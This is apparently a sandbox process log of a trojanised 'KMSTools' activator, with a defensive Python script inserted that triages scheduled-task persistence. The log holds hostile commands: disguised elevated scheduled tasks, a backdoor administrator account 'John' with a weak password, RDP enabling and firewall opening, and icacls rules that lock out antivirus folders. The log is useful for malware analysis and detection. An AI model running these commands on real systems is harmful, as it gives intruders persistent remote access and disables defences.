"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=6416,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6164 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4836,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2572 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3280,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3560 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5004,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5392 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5384,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3988 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6816,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2892 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5828,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5456 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3568,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5468 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3416,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5324 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5468,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6160 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe
"C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5560,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3288 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe
"C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\PerfLogs\KMSTools.zip"
C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe
"C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6840,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5424 /prefetch:8
C:\KMS Tools Lite Portable\KMSTools Lite.exe
"C:\KMS Tools Lite Portable\KMSTools Lite.exe"
C:\KMS Tools Lite Portable\GSetup.exe
"C:\KMS Tools Lite Portable\GSetup.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c copy C:\Windows\system32\Tasks\KMSTools "C:\Users\Admin\AppData\Local\Temp\KMSTools.tmp" /Y
C:\ProgramData\Setup\install.exe
C:\ProgramData\Setup\install.exe -palexpassword
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x510 0x514
C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe
"C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe" x data.pak -pratiboruskmstoolsmsfree.su -y -bsp1 -aos -o"C:\KMS Tools Lite Portable\Programs" "W10 Digital Activation Program"*
C:\KMS Tools Lite Portable\Programs\W10 Digital Activation Program\W10DigitalActivation.exe
"C:\KMS Tools Lite Portable\Programs\W10 Digital Activation Program\W10DigitalActivation.exe"
C:\ProgramData\Setup\KMS.exe
"C:\ProgramData\Setup\KMS.exe"
C:\ProgramData\Setup\update.exe
"C:\ProgramData\Setup\update.exe"
C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe
"C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe" x data.pak -pratiboruskmstoolsmsfree.su -y -bsp1 -aos -o"C:\KMS Tools Lite Portable\Programs" "Office Installer+"*
C:\KMS Tools Lite Portable\Programs\Office Installer+\Office Installer+_x64.exe
"C:\KMS Tools Lite Portable\Programs\Office Installer+\Office Installer+_x64.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\SystemManager" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\ManagerService" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\GlobalData" /TR "C:\Windows\SysWOW64\unsecapp.exe" /SC MINUTE /MO 1 /RL HIGHEST
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\WinlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\KMS Tools Lite Portable\Programs\Office Installer+\readme.txt
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\OnlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=3376,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5460 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=5368,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5584 /prefetch:1
C:\ProgramData\Microsoft\win.exe
C:\ProgramData\Microsoft\win.exe -ppidar
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x28c,0x7ff847c7f208,0x7ff847c7f214,0x7ff847c7f220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1852,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=2644 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2608,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=2616 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2296,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=3224 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4228,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4244 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4376,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4384 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4696,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4756 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4332,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4776 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=4728,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4176 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5332,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5332,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appidsvc
C:\Windows\system32\sc.exe
sc start appidsvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\winlogon.bat
C:\Windows\system32\sc.exe
sc config appidsvc start= auto
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\WindowsTask\new.xml"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\SysFilesQ\RecoveryHosts" /TR "C:\ProgramData\Microsoft\DRM\Vb0NjPwXy\SysFilesQ.bat" /SC ONLOGON /RL HIGHEST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT_Data" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\ProgramData\Setup\svchost.exe
C:\ProgramData\Setup\svchost.exe -ppidar
C:\ProgramData\Setup\IP.exe
"C:\ProgramData\Setup\IP.exe"
C:\ProgramData\Setup\smss.exe
"C:\ProgramData\Setup\smss.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST
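The schtasks /create lines above all register under the built-in Microsoft\Windows\ task folder, several of them re-launching a binary from C:\Programdata\ReaItekHD every minute or two with /RL HIGHEST, and that folder is spelled with a capital I where the listing's own C:\ProgramData\RealtekHD\taskhostw.exe invocation uses a lowercase l. The following is an added triage script, not part of the sandbox report, that parses such command lines and flags those three traits; the VENDOR_FOLDERS list and the five-minute watchdog threshold are illustrative assumptions, and the sample input is copied from the lines above.

```python
"""Triage `schtasks /create` command lines from a process listing.

Added example, not part of the sandbox report. Parses /TN /TR /SC /MO /RL and
flags: a task path under the built-in Microsoft\Windows\ folder; an action
binary in a user-writable location; a high-frequency elevated relaunch
(/SC MINUTE, small /MO, /RL HIGHEST); and a folder name that only equals a
known vendor name after confusable characters are folded (I->l, 1->l, 0->o).
VENDOR_FOLDERS and WATCHDOG_MAX_MINUTES are assumptions for illustration.
"""
import re

# Constructed sample: the schtasks lines copied from the process listing above.
SAMPLE_SCHTASKS = [
    r'"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\SystemManager" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST',
    r'"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\ManagerService" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST',
    r'"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\GlobalData" /TR "C:\Windows\SysWOW64\unsecapp.exe" /SC MINUTE /MO 1 /RL HIGHEST',
    r'"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\WinlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST',
    r'"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\OnlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST',
    r'"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\SysFilesQ\RecoveryHosts" /TR "C:\ProgramData\Microsoft\DRM\Vb0NjPwXy\SysFilesQ.bat" /SC ONLOGON /RL HIGHEST',
    r'"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST',
    r'"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST',
]

# A switch value is either a double-quoted string (allowing \" escapes) or a bare token.
SWITCH_RE = re.compile(r'/(TN|TR|SC|MO|RL)\s+("(?:[^"\\]|\\.)*"|\S+)', re.IGNORECASE)
USER_WRITABLE = ("\\programdata\\", "\\appdata\\", "\\users\\", "\\temp\\")
WATCHDOG_MAX_MINUTES = 5  # assumption: relaunch every <= 5 min looks like a watchdog
VENDOR_FOLDERS = {"realtekhd", "realtek", "nvidia", "intel", "microsoft", "google", "adobe"}  # assumed
FOLD = str.maketrans({"i": "l", "1": "l", "0": "o"})  # confusables, applied after lowercasing


def _unquote(value):
    if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
        return value[1:-1].replace('\\"', '"')
    return value


def parse_schtasks(cmdline):
    """Return the parsed switches (upper-case keys) or None if this is not a /create."""
    if not re.search(r'schtasks(?:\.exe)?"?\s+/create\b', cmdline, re.IGNORECASE):
        return None
    return {m.group(1).upper(): _unquote(m.group(2)) for m in SWITCH_RE.finditer(cmdline)}


def action_exe(action):
    """Executable part of the /TR action: the quoted path if quoted, else up to the first space."""
    if action.startswith('"'):
        end = action.find('"', 1)
        return action[1:end] if end > 0 else action[1:]
    return action.split(" ", 1)[0]


def confusable_vendor(component):
    """Vendor name that `component` imitates after confusable folding, or None."""
    low = component.lower()
    if low in VENDOR_FOLDERS:
        return None  # genuine spelling, nothing to flag
    folded = low.translate(FOLD)
    for vendor in VENDOR_FOLDERS:
        if folded == vendor.translate(FOLD):
            return vendor
    return None


def triage(cmdline):
    """Flags for one schtasks /create line; an empty list means nothing suspicious."""
    sw = parse_schtasks(cmdline)
    if sw is None:
        return None
    exe = action_exe(sw.get("TR", ""))
    low = exe.lower()
    flags = []
    if sw.get("TN", "").lower().startswith("microsoft\\windows\\"):
        flags.append("builtin_task_path")
    if any(marker in low for marker in USER_WRITABLE):
        flags.append("user_writable_binary")
    mo = sw.get("MO", "1")  # schtasks defaults /MO to 1 when omitted
    minutes = int(mo) if mo.isdigit() else 0
    if sw.get("SC", "").upper() == "MINUTE" and 0 < minutes <= WATCHDOG_MAX_MINUTES \
            and sw.get("RL", "").upper() == "HIGHEST":
        flags.append("elevated_watchdog")
    for component in exe.split("\\")[1:]:  # skip the drive letter
        vendor = confusable_vendor(component)
        if vendor:
            flags.append(f"confusable_vendor:{component}->{vendor}")
    return {"task": sw.get("TN"), "exe": exe, "flags": flags}


def triage_all(lines):
    return [r for r in (triage(line) for line in lines) if r is not None]


if __name__ == "__main__":
    for r in triage_all(SAMPLE_SCHTASKS):
        print(r["task"], "|", r["exe"], "|", ", ".join(r["flags"]) or "clean")
```

The confusable check deliberately folds both the observed folder and the vendor list before comparing, so a genuinely spelled vendor folder passes on the exact-match test first and only look-alikes reach the folded comparison.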
C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe"
C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" -second
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net user John 12345 /add
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add
C:\Windows\system32\net.exe
net user John 12345 /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user John 12345 /add
C:\Windows\system32\net.exe
net localgroup "Администраторы" John /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" John /add
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\system32\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
C:\Windows\system32\net.exe
net localgroup "Пользователи удаленного управления" john /add" John /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add
C:\Windows\system32\net.exe
net localgroup "Administrators" John /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" John /add
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add
C:\Windows\system32\net.exe
net localgroup "Administradores" John /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Administradores" John /add
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add
C:\Windows\system32\net.exe
net localgroup "Remote Desktop Users" john /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add
C:\Windows\SysWOW64\unsecapp.exe
C:\Windows\SysWOW64\unsecapp.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Programdata\Microsoft\temp\H.bat
C:\ProgramData\RDPWinst.exe
C:\ProgramData\RDPWinst.exe -i
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5704,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5800 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5748,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5776,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4148 /prefetch:8
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny "%username%":(OI)(CI)(F)
